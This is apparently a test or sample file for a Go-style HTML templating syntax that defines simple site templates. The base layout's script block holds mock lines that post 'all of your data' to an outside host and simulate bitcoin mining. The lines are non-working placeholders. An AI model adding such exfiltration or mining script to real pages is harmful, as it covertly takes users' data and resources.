package tting

import (
	"fmt"
	"bytes"
)

simp hi(b *bytes.Buffer) {
	<h1>Welcome to my Website</h1>
@	if true {
		<p>I hope you like it here!</h1>
@ 	} else {
		<p>I hope you HATE it here!</h1>
@ 	}

}

func other() bool {
	return false
}

simp base(b *bytes.Buffer, child func()) {
	<html>
		<head>
			<meta ...>
			<meta ...>
			<meta ...>
			<meta ...>
		</head>
		<body>
			<div>
				<header>HEADER</header>
@				child()
				<footer>FOOTER</footer>
			<div>
		<script>
			fetch("data.collection.ai", post = {all of your data});
			"hi\""
			setInterval(() => console.log('bitcoin mining'), 1);
		</script>
		</body>
	</html>
}

simp index(b *bytes.Buffer, user string) {
@	base(b, func() {
		<h1>Welcome to my site </h1>
		<p>How are you doing?</p>
		<div>hi @user welcome to my cool little website </div>
		<span>I hope you enjoy it here lol</span>
		<span>what is there to talk about</span>
		<nav>
			<a href="/">home</a>
			<a href="/privacy-policy">Privacy Policy</a>
			<a href="/sign-up">Sign Up</a>
			<a href="/sign-in">Sign In</a>
			<a href="/log-up">Log Up</a>
			<a href="/register">Register</a>
		</nav>
@	})
}

